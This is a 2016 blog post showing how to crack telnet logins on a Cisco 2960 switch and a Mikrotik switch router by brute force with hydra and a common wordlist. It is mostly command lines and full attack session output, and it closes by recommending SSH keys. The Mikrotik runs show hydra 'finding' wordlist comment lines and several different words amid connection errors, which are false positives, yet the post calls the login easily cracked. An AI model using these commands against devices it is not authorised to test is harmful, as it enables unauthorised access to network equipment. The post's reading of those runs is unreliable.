How to crack the cisco telnet password on a Cisco 2960 switch.

Posted: May 5, 2016. At: 12:47 PM. This was 2 years ago. Post ID: 9055
Page permalink.
WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters. These cookies expire two weeks after they are set.

Cracking the Cisco telnet password on a Cisco 2960 switch is very easy when you are using the hydra password cracking tool. I used this command to crack the telnet login.


hydra -P password.lst 10.42.0.87 cisco

This is the password cracking session that resulted in me cracking the telnet login.

[email protected]:~# hydra -P password.lst 10.42.0.87 cisco
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:28:39
[WARNING] you should set the number of parallel task to 4 for cisco services.
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service cisco on port 23
[23][cisco] host: 10.42.0.87   password: password

Here is another example, this is a telnet password set on a Mikrotik Cloud Switch Router.

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:42:06
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment:
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list is based on passwords most commonly seen on a set of Unix
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: systems in mid-1990's, sorted for decreasing number of occurrences
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: (that is, more common passwords are listed first).  It has been
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: revised to also include common website passwords from public lists
[ERROR] Child with pid 8260 terminating, can not connect
[ERROR] Child with pid 8262 terminating, can not connect
[ERROR] Child with pid 8263 terminating, can not connect
[ERROR] Child with pid 8264 terminating, can not connect
[ERROR] Child with pid 8268 terminating, can not connect
[ERROR] Child with pid 8266 terminating, can not connect
[ERROR] Child with pid 8267 terminating, can not connect
[ERROR] Child with pid 8269 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: password1
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: in 1996 through 2011.  It is assumed to be in the public domain.
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list has been compiled by Solar Designer of Openwall Project
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This is also easily cracked.

I am using the wordlist from /usr/share/john/password.lst, but there are wordlists in /usr/share/wordlists.

Here is another example,

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:49:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Child with pid 14712 terminating, can not connect
[ERROR] Child with pid 14715 terminating, can not connect
[ERROR] Child with pid 14714 terminating, can not connect
[ERROR] Child with pid 14713 terminating, can not connect
[ERROR] Child with pid 14719 terminating, can not connect
[ERROR] Child with pid 14717 terminating, can not connect
[ERROR] Child with pid 14716 terminating, can not connect
[ERROR] Child with pid 14720 terminating, can not connect
[ERROR] Child with pid 14718 terminating, can not connect
[ERROR] Child with pid 14721 terminating, can not connect
[ERROR] Child with pid 15070 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: spring
[23][telnet] host: 172.18.31.162   login: cisco   password: steven
[ERROR] Child with pid 15071 terminating, can not connect
[ERROR] Child with pid 15074 terminating, can not connect
[ERROR] Child with pid 15073 terminating, can not connect
[ERROR] Child with pid 15076 terminating, can not connect
[ERROR] Child with pid 15078 terminating, can not connect
[ERROR] Child with pid 15079 terminating, can not connect
[ERROR] Child with pid 15080 terminating, can not connect
[ERROR] Child with pid 15081 terminating, can not connect
[ERROR] Child with pid 15083 terminating, can not connect
[ERROR] Child with pid 15084 terminating, can not connect
[ERROR] Child with pid 15085 terminating, can not connect
[ERROR] Child with pid 15087 terminating, can not connect
[ERROR] Child with pid 15088 terminating, can not connect
[STATUS] 3559.00 tries/min, 3559 tries in 00:01h, 1 todo in 00:01h, 16 active
[23][telnet] host: 172.18.31.162   login: cisco   password: beavis
[STATUS] 1779.50 tries/min, 3559 tries in 00:02h, 1 todo in 00:01h, 16 active
[STATUS] 1186.33 tries/min, 3559 tries in 00:03h, 1 todo in 00:01h, 16 active
[STATUS] 889.75 tries/min, 3559 tries in 00:04h, 1 todo in 00:01h, 16 active
[STATUS] 711.80 tries/min, 3559 tries in 00:05h, 1 todo in 00:01h, 16 active
[STATUS] 593.17 tries/min, 3559 tries in 00:06h, 1 todo in 00:01h, 16 active
[STATUS] 508.43 tries/min, 3559 tries in 00:07h, 1 todo in 00:01h, 16 active
[STATUS] 444.88 tries/min, 3559 tries in 00:08h, 1 todo in 00:01h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This goes to show the telnet protocol is very insecure at the best of times especially when you are using a weak password. That is why it is better to use SSH on a Cisco switch or router and SSH keys instead of passwords.

No comments have been made. Use this form to start the conversation :)

Leave a Reply